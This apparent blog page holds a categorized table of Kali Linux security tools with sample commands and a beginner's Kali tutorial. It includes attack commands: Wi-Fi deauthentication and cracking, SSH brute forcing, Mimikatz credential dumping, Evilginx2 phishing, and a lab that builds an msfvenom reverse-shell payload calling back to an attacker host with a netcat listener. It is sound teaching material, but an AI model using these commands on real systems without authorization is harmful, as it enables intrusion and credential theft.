Kali Linux Tools

 Here's a categorized list of key Kali Linux tools with brief usage summaries for best cybersecurity course:

1. Information Gathering

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Nmap | Network scanner | nmap -sV 192.168.1.1 |

| Recon-ng | Web reconnaissance | recon-ng -m recon/domains-hosts/google_site |

| theHarvester | Email/subdomain OSINT | theHarvester -d example.com -l 100 -b google |

| Maltego | Visual link analysis | GUI-based entity mapping |

| DNSenum | DNS enumeration | dnsenum example.com |


2. Vulnerability Analysis

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Nessus | Vulnerability scanner | GUI (Commercial) |

| OpenVAS | Open-source vulnerability scanner | `gvm-start` → Access via browser |

| Nikto | Web server scanner | `nikto -h http://example.com` |

| Lynis | System auditing | `lynis audit system` |


3. Wireless Attacks

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Aircrack-ng | Wi-Fi cracking | `aircrack-ng -w rockyou.txt capture.cap` |

| Wifite | Automated Wi-Fi attacks | `wifite --kill` |

| Kismet | Wireless detector | `kismet -c wlan0mon` |

| Fern Wifi Cracker | GUI Wi-Fi cracker | GUI-based attack tool |


4. Web Application Tools

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Burp Suite | Web proxy | Configure browser → `127.0.0.1:8080` |

| OWASP ZAP | Web app scanner | GUI automated scans |

| SQLmap | SQL injection | `sqlmap -u "http://site.com?id=1" --dbs` |

| Dirb/Dirbuster | Directory brute-forcing | `dirb http://example.com wordlist.txt` |

| Commix | Command injection | `commix -u http://site.com?cmd=whoami` |


5. Password Attacks

| Tool | Description | Basic Usage |

|------|-------------|------------|

| John the Ripper | Password cracker | `john --format=md5 hashes.txt` |

| Hashcat | GPU-accelerated cracking | `hashcat -m 0 hash.txt rockyou.txt` |

| Hydra | Network login cracker | `hydra -l admin -P pass.txt ssh://192.168.1.1` |

| Crunch | Wordlist generator | `crunch 6 8 123abc -o wordlist.txt` |

6. Exploitation Tools

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Metasploit | Exploit framework | `msfconsole` → `use exploit/multi/handler` |

| Searchsploit | ExploitDB search | `searchsploit apache 2.4` |

| BeEF | Browser exploitation | `beef-xss` → Hook browsers |

| Armitage | GUI for Metasploit | GUI-based attack management |


7. Post-Exploitation

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Mimikatz | Windows cred dumping | `sekurlsa::logonpasswords` |

| PowerSploit | PowerShell exploits | Load via `Import-Module` in PS |

| Cobalt Strike | Red team C2 | Commercial GUI framework |

| Empire | Post-exploit framework | `./empire` → `listeners` |


8. Forensics Tools

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Autopsy | GUI digital forensics | Analyze disk images |

| Volatility | Memory forensics | `volatility -f memory.dmp pslist` |

| Binwalk | Firmware analysis | `binwalk -e firmware.bin` |

| Foremost | File carving | `foremost -i image.dd -o output` |


9. Social Engineering

| Tool | Description | Basic Usage |

|------|-------------|------------|

| SET (Social Engineer Toolkit) | Phishing/attacks | `setoolkit` → Option 1 |

| Gophish | Email phishing | GUI-based campaign setup |

| Evilginx2 | Advanced phishing | `evilginx -d microsoft.com` |

| King Phisher | Phishing campaigns | GUI template editor |


10. Hardware Hacking

| Tool | Description | Basic Usage |

|------|-------------|------------|

| RFcat | RF tool (433MHz, etc.) | rfcat -r → Interactive |

| JTAGulator | JTAG pin finder | Hardware debugging |

| Bus Pirate | Universal serial interface | `screen /dev/ttyUSB0 115200` |


11. Reverse Engineering

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Ghidra | NSA’s decompiler | GUI-based analysis |

| IDA Pro | Disassembler (Commercial) | Load binary → Analyze |

| Radare2 | CLI disassembler | `r2 -d ./binary` |

| x64dbg | Windows debugger | GUI debugging |


12. Reporting Tools

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Dradis | Collaborative reporting | Web-based note-taking |

| Faraday | Pentest collaboration | GUI workspace |

| Maltego | Visual link charts | Entity relationship mapping |


13. Miscellaneous

| Tool | Description | Basic Usage |

|------|-------------|------------|

| Wireshark | Network analyzer | GUI packet inspection |

| Tshark | CLI packet analysis | `tshark -i eth0 -Y "http"` |

| Netcat | Network Swiss Army knife | `nc -lvnp 4444` (Listener) |

| Socat | Advanced Netcat | `socat TCP-LISTEN:4444 STDOUT` |


Key Notes:

- Run tools as root when needed (sudo).

- Update Kali regularly:  

  bash

  sudo apt update && sudo apt full-upgrade -y       

 -All tools are most important for cybersecurity course

  -Legal use only : Always get proper authorization.


🚀 Pro Tip: Use man <tool> or <tool> --help for detailed usage!  



No comments:

Kali Linux: The Complete Tutorial

1. Introduction to Kali Linux

Kali Linux is the part of cybersecurity course and world's most advanced penetration testing distribution, maintained by Offensive Security. It comes pre-installed with 600+ cybersecurity tools for:

- Ethical hacking & penetration testing

- Digital forensics

- Security research

- Vulnerability assessment


Key Features

✅ Free & open-source  

✅ Custom kernel patched for injection  

✅ Supports ARM devices (Raspberry Pi, Android)  

✅ Rolling release updates  


2. Kali Linux Installation

A. Installation Options

1. Bare Metal Install (Directly on hardware)

2. Virtual Machine (VMware/VirtualBox)

3. Live USB (Persistent storage possible)

4. WSL (Windows Subsystem for Linux)

5. Cloud (AWS, Azure, Google Cloud)

B. Recommended System Requirements

- RAM : 4GB+ (8GB preferred)

- Storage : 20GB+ free space

- CPU : 64-bit processor (Intel/AMD)


C. Installation Steps

1. Download ISO from [kali.org](https://www.kali.org/get-kali/)

2. Create bootable USB (Use Rufus or dd):

   bash

      dd if=kali-linux.iso of=/dev/sdb bs=4M status=progress      

   3. Boot from USB and follow installer


3. Kali Linux Setup & Configuration

A. First Boot Tasks

1. Update system :

   bash

   sudo apt update && sudo apt full-upgrade -y

2. Install guest additions (If using VM):

   bash

   sudo apt install -y open-vm-tools-desktop     

   

B. Essential Configurations

1. Enable SSH :

   bash

   sudo systemctl enable ssh --now      

 

2. Change default password (`kali:kali`):

   bash

   passwd     

   3. Add a new user :

   bash

   sudo useradd -m -G sudo newuser   

   sudo passwd newuser                                                  

   

C. Customizing Kali

1. Install favorite tools :

   bash

   sudo apt install -y terminator flameshot neofetch    

   2. Change desktop environment :

   bash

   sudo apt install -y kali-desktop-xfce  # Switch to XFCE      

   

4. Kali Linux Tools Overview

Kali organizes tools into 14 categories :


A. Information Gathering

- Nmap (Network scanning)

- Recon-ng (Web reconnaissance)

- theHarvester (Email/domain OSINT)


B. Vulnerability Analysis

- Nessus (Vulnerability scanner)

- OpenVAS (Open-source alternative)

- Nikto (Web server scanner)


C. Wireless Attacks

- Aircrack-ng (Wi-Fi cracking)

- Wifite (Automated Wi-Fi attacks)

- Kismet (Wireless detection)


D. Web Application Analysis

- Burp Suite (Web proxy)

- OWASP ZAP (Web app scanner)

- SQLmap (SQL injection)


E. Password Attacks

- Hydra (Network login cracker)

- John the Ripper (Password cracking)

- Hashcat (GPU-accelerated cracking)


F. Exploitation Tools

- Metasploit Framework (Exploit development)

- ExploitDB (Archive of exploits)

- BeEF (Browser exploitation)


G. Post-Exploitation

- Mimikatz (Windows credential dumping)

- PowerSploit (Post-exploit PowerShell)

- Cobalt Strike (Advanced red teaming)


H. Forensics Tools

- Autopsy (Digital forensics)

- Volatility (Memory forensics)

- Binwalk (Firmware analysis)


I. Social Engineering

- SET (Social Engineer Toolkit)

- Gophish (Phishing framework)

- Evilginx2 (Advanced phishing)


5. Kali Linux Terminal Basics

Essential Commands

| Command | Description |

|---------      |-------------|

|        sudo | Execute as root |

| apt update | Update package list |

|  apt install <pkg> | Install software |

| ip a | Show network interfaces |

|  cd | Change directory |

|  ls | List files |

| chmod | Change permissions |

|    grep | Search text |

|    find | Locate files |


Managing Services

bash

sudo systemctl start ssh   # Start SSH      

sudo systemctl stop ssh    # Stop SSH     

sudo systemctl status ssh  # Check status


6. Practical Kali Linux Labs

Lab 1: Network Scanning with Nmap

bash

sudo nmap -sV -A 192.168.1.1  # Basic scan     

sudo nmap -p- -T4 192.168.1.1  # Full port scan  


Lab 2: Cracking Wi-Fi with Aircrack-ng

bash

sudo airmon-ng start wlan0                 

sudo airodump-ng wlan0mon             

sudo aireplay-ng --deauth 0 -a <BSSID> wlan0mon       

sudo aircrack-ng -w rockyou.txt capture.cap                  


Lab 3: Web App Testing with Burp Suite

1. Configure browser proxy (`127.0.0.1:8080`)

2. Intercept requests and modify parameters


Lab 4: Creating a Reverse Shell

bash

msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f elf > shell.elf    

nc -lvnp 4444  # On attacker machine            


7. Kali Linux Tips & Tricks

A. Performance Optimization

- Disable unnecessary services :

  bash

  sudo systemctl disable bluetooth       

- Use ZRAM for better RAM management :

  bash

  sudo apt install -y zram-config         

 

B. Troubleshooting

1. Wi-Fi not working?

   bash

   sudo apt install -y firmware-realtek     

   

2. Graphics issues?

   bash

       sudo apt install -y kali-desktop-xfce        


C. Maintaining Kali

- Regular updates:

  bash

  sudo apt update && sudo apt full-upgrade -y     

- Clean old packages:

  bash

         sudo apt autoremove          


8. Kali Linux for Different Use Cases

A. Penetration Testing

- Use Metasploit, Burp Suite, Nmap

- Follow OSCP-like methodology


B. Red Teaming

- Focus on C2 frameworks  (Cobalt Strike)

- Practice lateral movement


C. Digital Forensics

- Use  Autopsy, Volatility

- Learn file carving techniques 


D. Bug Bounty Hunting

- Master Burp Suite, SQLmap

- Focus on web vulnerabilities


9. Learning Resources

Free Courses

- [Kali Linux Revealed](https://kali.training/) (Official course)

- [TryHackMe Kali Linux](https://tryhackme.com/path/outline/kali) (Interactive)


Books

- "Penetration Testing with Kali Linux" (PWK/OSCP)

- "The Hacker Playbook" series


YouTube Channels

- The Cyber Mentor

- Null Byte

- Hackersploit


10. Ethical & Legal Considerations

⚠ Only test systems you own or have permission to test  

⚠ Do not use Kali for illegal activities  

⚠ Follow responsible disclosure  


Conclusion

Kali Linux is the ultimate toolkit for cybersecurity professionals. Mastering it requires:

1. Learning the tools

2. Practicing in labs 

3. Staying updated  


🔹 Next Steps :  

1. Set up your Kali lab environment  

2. Complete the Kali Linux Revealed course  

3. Start HTB/TryHackMe challenges  


🚀 Want a customized Kali Linux learning path? Let me know your goals!  





No comments:
Subscribe to: Posts (Atom)